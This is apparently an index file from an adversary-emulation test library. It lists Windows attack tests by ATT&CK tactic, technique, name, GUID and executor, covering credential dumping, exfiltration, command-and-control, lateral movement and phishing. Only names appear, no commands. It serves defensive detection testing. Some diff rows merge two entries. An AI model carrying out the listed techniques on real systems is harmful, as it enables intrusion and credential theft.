discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
342 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
343 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
344 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
347 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
348 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
349 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
discovery T1018 Remote System Discovery 19 Get-wmiobject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
350 discovery T1518.001 Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
351 discovery T1518.001 Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
352 discovery T1518.001 Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
354 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
355 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
356 discovery T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
discovery T1497.001 System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
357 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
358 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
359 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
discovery T1614.001 System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
discovery T1614.001 System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
360 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
361 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
362 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
363 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
364 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
365 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
366 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
367 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
368 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
369 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
370 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
381 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
382 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
383 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
command-and-control T1105 Ingress Tool Transfer 18 Curl Download File 2b080b99-0deb-4d51-af0f-833d37c4ca6a command_prompt
command-and-control T1105 Ingress Tool Transfer 19 Curl Upload File 635c9a38-6cbf-47dc-8615-3810bc1167cf command_prompt
command-and-control T1105 Ingress Tool Transfer 20 Download a file with Microsoft Connection Manager Auto-Download d239772b-88e2-4a2e-8473-897503401bcc command_prompt
384 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
command-and-control T1090.003 Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
command-and-control T1090.003 Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
385 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
386 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
387 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
388 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
389 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
390 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
391 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
command-and-control T1132.001 Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
392 command-and-control T1071.001 Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
393 command-and-control T1071.001 Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
394 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
395 collection T1560.001 Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
396 collection T1560.001 Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
397 collection T1560.001 Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
398 collection T1560.001 Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
399 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
400 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
401 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
402 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
403 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
404 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
405 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
406 collection T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
407 collection T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
408 collection T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
409 collection T1074.001 Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
410 collection T1074.001 Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
411 collection T1114.001 Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
412 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
413 execution T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
414 execution T1559.002 Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
415 execution T1559.002 Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
418 execution T1204.002 Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
419 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
420 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
execution T1204.002 Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
421 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
422 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
423 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
433 execution T1059.001 PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
434 execution T1059.001 PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
435 execution T1059.001 PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
execution T1059.001 PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
execution T1059.001 PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
execution T1059.001 PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
execution T1059.001 PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
execution T1059.001 PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
execution T1059.001 PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
execution T1059.001 PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
436 execution T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
437 execution T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
438 execution T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
439 execution T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
execution T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
execution T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
execution T1053.005 Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
440 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
441 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
442 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
execution T1059.005 Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
443 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
execution T1059.003 Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
execution T1059.003 Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
execution T1059.003 Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
444 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
445 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
446 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
447 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
448 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
449 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
450 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
exfiltration T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
451 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
452 exfiltration credential-access T1048.003 T1056.004 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Credential API Hooking 4 1 Exfiltration Over Alternative Protocol - HTTP Hook PowerShell TLS Encrypt/Decrypt Messages 6aa58451-1121-4490-a8e9-1dada3f1c68c de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
453 exfiltration credential-access T1048.003 T1552.001 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Credentials In Files 5 3 Exfiltration Over Alternative Protocol - SMTP Extracting passwords with findstr ec3a835e-adca-4c7c-88d2-853b69c11bb9 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
454 exfiltration credential-access T1567 T1552.001 Exfiltration Over Web Service Credentials In Files 1 4 Data Exfiltration with ConfigSecurityPolicy Access unattend.xml 5568a8f4-a8b1-4c40-9399-4969b642f122 367d4004-5fc0-446d-823f-960c74ae52c3 powershell command_prompt
455 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
456 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
457 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
458 credential-access T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
459 credential-access T1552.006 Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
460 credential-access T1552.006 Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
461 credential-access T1558.003 Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
462 credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
463 credential-access T1003.004 LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
464 credential-access T1003.001 LSASS Memory 1 Windows Credential Editor 0f7c5301-6859-45ba-8b4d-1fac30fc31ed command_prompt
465 credential-access T1003.001 LSASS Memory 2 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
466 credential-access T1003.001 LSASS Memory 3 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
467 credential-access T1003.001 LSASS Memory 4 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
468 credential-access T1003.001 LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
469 credential-access T1003.001 LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
470 credential-access T1003.001 LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
471 credential-access T1003.003 NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
472 credential-access T1003.003 NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
473 credential-access T1003.003 NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
474 credential-access T1003.003 NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
475 credential-access T1003.003 NTDS 5 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
476 credential-access T1003.003 NTDS 6 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
477 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
478 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
479 credential-access T1003 OS Credential Dumping 1 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
480 credential-access T1003 OS Credential Dumping 2 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
481 credential-access T1003 OS Credential Dumping 3 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
482 credential-access T1110.002 Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
483 credential-access T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
484 credential-access T1110.001 Password Guessing 1 Brute Force Credentials 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
485 credential-access T1110.003 Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
486 credential-access T1110.003 Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
487 credential-access T1552.004 Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
488 credential-access T1003.002 Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
489 credential-access T1003.002 Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
490 credential-access T1003.002 Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
491 credential-access T1003.002 Security Account Manager 4 PowerDump Registry dump of SAM for hashes and usernames 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
492 lateral-movement T1021.003 Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
493 lateral-movement T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
494 lateral-movement T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
lateral-movement T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
495 lateral-movement T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
lateral-movement T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
496 lateral-movement T1563.002 RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
497 lateral-movement T1021.001 Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
498 lateral-movement T1021.001 Remote Desktop Protocol 2 RDP to Server 7382a43e-f19c-46be-8f09-5c63af7d3e2b powershell
lateral-movement T1021.001 Remote Desktop Protocol 3 Changing RDP Port to Non Standard Port via Powershell 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 powershell
lateral-movement T1021.001 Remote Desktop Protocol 4 Changing RDP Port to Non Standard Port via Command_Prompt 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 command_prompt
lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
499 lateral-movement T1021.002 SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
500 lateral-movement T1021.002 SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
501 lateral-movement T1021.002 SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
502 lateral-movement T1021.002 SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
503 lateral-movement T1021.006 Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
504 lateral-movement T1021.006 Windows Remote Management 2 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
505 lateral-movement T1021.006 Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
506 initial-access T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
507 initial-access T1078.001 T1566.001 Default Accounts Spearphishing Attachment 2 1 Activate Guest Account Download Phishing Attachment - VBScript aa6cb8c4-b582-4f8e-b677-37733914abda 114ccff9-ae6d-4547-9ead-4cd69f687306 command_prompt powershell
initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
initial-access T1078.003 Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
initial-access T1566.001 Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
508 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
atomics/Indexes/Indexes-Markdown/index.md
+626 -1241
View File
